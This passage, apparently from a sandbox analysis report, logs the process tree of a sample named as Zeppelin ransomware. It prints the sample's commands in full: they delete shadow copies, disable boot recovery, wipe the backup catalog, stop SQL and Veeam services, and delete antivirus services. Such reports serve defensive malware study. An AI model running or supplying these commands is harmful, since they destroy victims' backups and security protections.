wrote to memory of 2628 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2628 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2224 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2224 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2224 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2224 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2060 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2060 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2060 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2060 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2464 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2464 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2464 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2464 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2852 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2852 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2852 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2852 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2916 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2916 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2916 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 744 wrote to memory of 2916 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe PID 2216 wrote to memory of 2772 2216 cmd.exe WMIC.exe PID 2216 wrote to memory of 2772 2216 cmd.exe WMIC.exe PID 2216 wrote to memory of 2772 2216 cmd.exe WMIC.exe PID 2216 wrote to memory of 2772 2216 cmd.exe WMIC.exe PID 2060 wrote to memory of 2412 2060 cmd.exe vssadmin.exe PID 2060 wrote to memory of 2412 2060 cmd.exe vssadmin.exe PID 2060 wrote to memory of 2412 2060 cmd.exe vssadmin.exe PID 2060 wrote to memory of 2412 2060 cmd.exe vssadmin.exe PID 2464 wrote to memory of 1852 2464 cmd.exe WMIC.exe PID 2464 wrote to memory of 1852 2464 cmd.exe WMIC.exe PID 2464 wrote to memory of 1852 2464 cmd.exe WMIC.exe PID 2464 wrote to memory of 1852 2464 cmd.exe WMIC.exe PID 2464 wrote to memory of 996 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 996 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 996 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 996 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2804 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2804 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2804 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2804 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2800 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2800 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2800 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 2800 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 936 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 936 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 936 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 936 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 1924 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 1924 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 1924 2464 cmd.exe vssadmin.exe PID 2464 wrote to memory of 1924 2464 cmd.exe vssadmin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe"C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe"1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵PID:2204
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:2224
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:996
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2804
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2800
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:936
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=G: /on=G: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1924
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=H: /on=H: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:660
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=J: /on=J: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1964
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=K: /on=K: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1684
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=L: /on=L: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2300
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=M: /on=M: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1808
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=N: /on=N: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2324
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive3⤵PID:832
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher$CITRIX3⤵PID:808
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher$CITRIX start=disabled3⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher3⤵
- Launches sc.exe
PID:2012
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher start=disabled3⤵
- Launches sc.exe
PID:1088
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$CITRIX3⤵PID:2632
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$CITRIX start=disabled3⤵PID:1532
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:1604
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLSERVERAGENT3⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled3⤵PID:2288
-
-
C:\Windows\SysWOW64\sc.exesc stop MSOLAP$CITRIX3⤵
- Launches sc.exe
PID:2168
-
-
C:\Windows\SysWOW64\sc.exesc config MSOLAP$CITRIX start=disabled3⤵PID:852
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLBrowser3⤵PID:1120
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled3⤵PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter3⤵PID:1608
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled3⤵PID:832
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$SQLEXPRESS3⤵
- Launches sc.exe
PID:1752
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS start=disabled3⤵PID:2672
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:684
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:1676
-
-
C:\Windows\SysWOW64\sc.exesc stop postgresql-9.53⤵PID:1756
-
-
C:\Windows\SysWOW64\sc.exesc config postgresql-9.5 start=disabled3⤵PID:1288
-
-
C:\Windows\SysWOW64\sc.exesc stop fsdevcon3⤵PID:2492
-
-
C:\Windows\SysWOW64\sc.exesc config fsdevcon start=disabled3⤵PID:2880
-
-
C:\Windows\SysWOW64\sc.exesc stop fshoster3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc config fshoster start=disabled3⤵PID:1304
-
-
C:\Windows\SysWOW64\sc.exesc stop fsnethoster3⤵PID:2244
-
-
C:\Windows\SysWOW64\sc.exesc config fsnethoster start=disabled3⤵PID:740
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulhoster3⤵PID:1344
-
-
C:\Windows\SysWOW64\sc.exesc config fsulhoster start=disabled3⤵PID:1116
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulnethoster3⤵PID:1908
-
-
C:\Windows\SysWOW64\sc.exesc config fsulnethoster start=disabled3⤵PID:2948
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulorsp3⤵PID:2480
-
-
C:\Windows\SysWOW64\sc.exesc config fsulorsp start=disabled3⤵PID:2320
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulprothoster3⤵PID:2220
-
-
C:\Windows\SysWOW64\sc.exesc config fsulprothoster start=disabled3⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\SysWOW64\sc.exesc stop FSAUS3⤵PID:2700
-
-
C:\Windows\SysWOW64\sc.exesc config FSAUS start=disabled3⤵PID:2276
-
-
C:\Windows\SysWOW64\sc.exesc stop fsms3⤵PID:1836
-
-
C:\Windows\SysWOW64\sc.exesc config fsms start=disabled3⤵
- Enumerates connected drives
PID:2324
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamAWSSvc3⤵PID:1272
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamAWSSvc start=disabled3⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamAzureSvc3⤵PID:2908
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamAzureSvc start=disabled3⤵PID:1076
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamEnterpriseManagerSvc3⤵PID:2932
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamEnterpriseManagerSvc start=disabled3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupRESTSvc3⤵PID:1948
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupRESTSvc start=disabled3⤵
- Launches sc.exe
PID:2480
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupSvc3⤵PID:1932
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupSvc start=disabled3⤵PID:3000
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamFilesysVssSvc3⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamFilesysVssSvc start=disabled3⤵PID:2640
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBrokerSvc3⤵PID:2816
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBrokerSvc start=disabled3⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupCdpSvc3⤵PID:1728
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupCdpSvc start=disabled3⤵PID:1304
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamCloudSvc3⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamCloudSvc start=disabled3⤵PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamTransportSvc3⤵PID:1696
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamTransportSvc start=disabled3⤵PID:852
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamDistributionSvc3⤵PID:1212
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamDistributionSvc start=disabled3⤵PID:2952
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamExplorersRecoverySvc3⤵PID:2816
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamExplorersRecoverySvc start=disabled3⤵
- Launches sc.exe
PID:972
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamGCPSvc3⤵PID:2236
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamGCPSvc start=disabled3⤵PID:272
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamGuestHelper3⤵
- Launches sc.exe
PID:1928
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamGuestHelper start=disabled3⤵
- Launches sc.exe
PID:1700
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamCatalogSvc3⤵PID:1392
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamCatalogSvc start=disabled3⤵PID:1344
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamHvIntegrationSvc3⤵PID:2260
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamHvIntegrationSvc start=disabled3⤵PID:2376
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamDeploySvc3⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamDeploySvc start=disabled3⤵PID:2380
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamMountSvc3⤵
- Launches sc.exe
PID:2292
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamMountSvc start=disabled3⤵PID:2752
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamRESTSvc3⤵
- Launches sc.exe
PID:2116
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamRESTSvc start=disabled3⤵PID:976
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamNFSSvc3⤵PID:1624
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamNFSSvc start=disabled3⤵PID:2284
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamVssProviderSvc3⤵PID:2880
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamVssProviderSvc start=disabled3⤵PID:2968
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher$CITRIX3⤵
- Launches sc.exe
PID:2008
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher$CITRIX start= disabled3⤵PID:1244
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$VEEAMSQL20163⤵PID:1844
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$VEEAMSQL2016 start=disabled3⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLBrowser3⤵
- Launches sc.exe
PID:2152
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled3⤵PID:2692
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$VEEAMSQL20163⤵
- Launches sc.exe
PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$VEEAMSQL2016 start=disabled3⤵PID:1688
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter3⤵PID:3008
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled3⤵PID:2744
-
-
C:\Windows\SysWOW64\sc.exesc stop SageMySQL3⤵PID:1484
-
-
C:\Windows\SysWOW64\sc.exesc config SageMySQL start=disabled3⤵PID:272
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$VEEAMSQL20163⤵PID:304
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$VEEAMSQL2016 start=disabled3⤵PID:1464
-
-
C:\Windows\SysWOW64\sc.exesc stop ReportServer$V4SQLEXPRESS3⤵PID:1168
-
-
C:\Windows\SysWOW64\sc.exesc config ReportServer$V4SQLEXPRESS start=disabled3⤵PID:2596
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$SDPRO_V4_SQL3⤵PID:3048
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled3⤵
- Launches sc.exe
PID:580
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$MICROSOFT##WID3⤵
- Launches sc.exe
PID:2688
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$MICROSOFT##WID start=disabled3⤵PID:1592
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLServerOLAPService3⤵PID:2968
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLServerOLAPService start=disabled3⤵
- Launches sc.exe
PID:320
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher3⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher start=disabled3⤵PID:1264
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLSERVERAGENT3⤵PID:1856
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled3⤵PID:1780
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵
- Launches sc.exe
PID:3044
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY3⤵PID:952
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY start=disabled3⤵PID:2748
-
-
C:\Windows\SysWOW64\sc.exesc stop MsDtsServer1303⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\SysWOW64\sc.exesc config MsDtsServer130 start=disabled3⤵PID:2636
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$BVMS3⤵PID:3020
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$BVMS start=disabled3⤵PID:1604
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$SQLEXPRESS20143⤵PID:2340
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS2014 start=disabled3⤵PID:2236
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵
- Launches sc.exe
PID:1032
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵
- Launches sc.exe
PID:1348
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵PID:1376
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵PID:740
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵PID:832
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵PID:2260
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵PID:1212
-
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵PID:2928
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵
- Launches sc.exe
PID:2864
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵PID:2944
-
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵PID:1848
-
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵PID:2352
-
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵PID:2124
-
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵PID:1708
-
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵PID:528
-
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
PID:680
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵PID:832
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵PID:300
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵PID:2376
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:2220
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵PID:1804
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵PID:2612
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵PID:2632
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵PID:1284
-
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵PID:1612
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵PID:1960
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵PID:1564
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵
- Launches sc.exe
PID:1992
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵PID:1696
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵PID:612
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
- Launches sc.exe
PID:1144
-
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵PID:2412
-
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵
- Launches sc.exe
PID:2856
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:2012
-
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵PID:2768
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵
- Launches sc.exe
PID:2736
-
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵PID:2124
-
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵PID:1324
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵PID:1632
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵PID:2520
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵PID:2368
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵PID:3052
-
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵PID:2940
-
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵PID:2728
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵PID:432
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵PID:2752
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵PID:976
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵PID:1372
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵
- Launches sc.exe
PID:3008
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵PID:2340
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵PID:1348
-
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵PID:1392
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵PID:1328
-
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵PID:2272
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵PID:2776
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵PID:2652
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵PID:2248
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵PID:2016
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵PID:2692
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
- Launches sc.exe
PID:2300
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
- Launches sc.exe
PID:1896
-
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵PID:2680
-
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵PID:1468
-
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵PID:3024
-
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵PID:2948
-
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵PID:1280
-
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵PID:2980
-
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵PID:1640
-
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵PID:1532
-
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵PID:2968
-
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵PID:1612
-
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵PID:1364
-
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵PID:2888
-
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵PID:484
-
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵PID:1680
-
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵PID:1388
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵
- Launches sc.exe
PID:272
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵PID:2480
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵PID:1724
-
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵PID:2320
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵PID:1012
-
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵PID:2312
-
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵
- Launches sc.exe
PID:1036
-
-
